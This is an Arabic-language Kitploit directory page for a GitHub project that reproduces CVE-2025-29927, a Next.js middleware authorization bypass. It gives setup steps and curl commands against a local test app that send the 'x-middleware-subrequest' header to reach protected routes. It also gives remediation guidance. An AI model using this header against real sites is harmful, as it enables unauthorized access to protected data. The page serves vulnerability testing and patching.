Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
claude-create-CVE-2025-29927 — يختبر ويوضح ثغرة CVE-2025-29927، وهي تجاوز للتحقق من الصلاحيات في البرمجيات الوسيطة لـ Next.js. يتضمن سكربتات لاختبار الاستغلال والوصول العادي، بالإضافة إلى إرشادات الإصلاح. | Kitploit
أدوات/GitHubGitHub/maronnjapan/claude-create-cve-2025-29927
تحليل الثغرات الأمنيةاستغلال تطبيقات الويبأمن الويبالتعلم والتعليم
GitHubmaronnjapan/claude-create-cve-2025-29927

claude-create-CVE-2025-29927

يختبر ويوضح ثغرة CVE-2025-29927، وهي تجاوز للتحقق من الصلاحيات في البرمجيات الوسيطة لـ Next.js. يتضمن سكربتات لاختبار الاستغلال والوصول العادي، بالإضافة إلى إرشادات الإصلاح.

عرض المستودع
3منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مختبِر ثغرة الوسيط في Next.js (CVE-2025-29927)

يُظهر هذا التطبيق ثغرة تجاوز تفويض الوسيط في Next.js (CVE-2025-29927).

حول الثغرة

CVE-2025-29927 هي ثغرة تجاوز تفويض في وسيط Next.js. من خلال إرسال ترويسة HTTP مصممة خصيصًا (x-middleware-subrequest)، يمكن للمهاجم تجاوز فحوصات التفويض المنفَّذة في الوسيط، مما قد يتيح له الوصول إلى موارد محمية.

تعليمات الإعداد

  1. ثبّت التبعيات:

    root@kitploit:~
    cd /var/www/react-nextjs/test-middleware-skip
    npm install
    
  2. شغّل خادم التطوير:

    root@kitploit:~
    npm run dev
    
  3. سيبدأ الخادم على http://localhost:3000

اختبار الثغرة

الوصول العادي (يجب أن يتم حظره)

جرّب الوصول إلى المسار المحمي بشكل طبيعي:

root@kitploit:~
npm run test-normal

أو

root@kitploit:~
curl -v http://localhost:3000/protected-data

يجب أن تتلقى استجابة 401 Unauthorized، لأن الوسيط يحظر الوصول.

استغلال الثغرة

جرّب الوصول إلى المسار المحمي باستخدام ترويسة الاستغلال:

root@kitploit:~
npm run test-exploit

أو

root@kitploit:~
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/protected-data

إذا كان التطبيق عرضة للثغرة، فستتلقى استجابة 200 OK مع البيانات المحمية.

اختبار مسار API

الوصول العادي (يجب أن يتم حظره):

root@kitploit:~
curl -v http://localhost:3000/api/protected

مع الاستغلال:

root@kitploit:~
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected

المعالجة

لإصلاح هذه الثغرة، يجب عليك:

  1. حدّث Next.js إلى إصدار مصحح:

    • Next.js 15.x: حدّث إلى 15.2.3 أو أحدث
    • Next.js 14.x: حدّث إلى 14.2.25 أو أحدث
    • Next.js 13.x: حدّث إلى 13.5.9 أو أحدث
    • Next.js 12.x: حدّث إلى 12.3.5 أو أحدث
  2. إذا لم تتمكن من التحديث، فقم بتنفيذ وكيل عكسي (مثل Nginx أو Cloudflare) يعمل على إزالة ترويسة x-middleware-subrequest من الطلبات الواردة.

أوامر اختبار إضافية

اختبر ما إذا كان مسار API عرضة للثغرة:

root@kitploit:~
# Normal request (should be blocked)
curl -v http://localhost:3000/api/protected

# With exploit header
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected

إخلاء مسؤولية

تُقدَّم هذه الأداة لأغراض تعليمية واختبار أمني فقط. استخدمها للتحقق مما إذا كانت تطبيقات Next.js الخاصة بك عرضة للثغرة وتحتاج إلى تصحيح.

تنزيل الأداة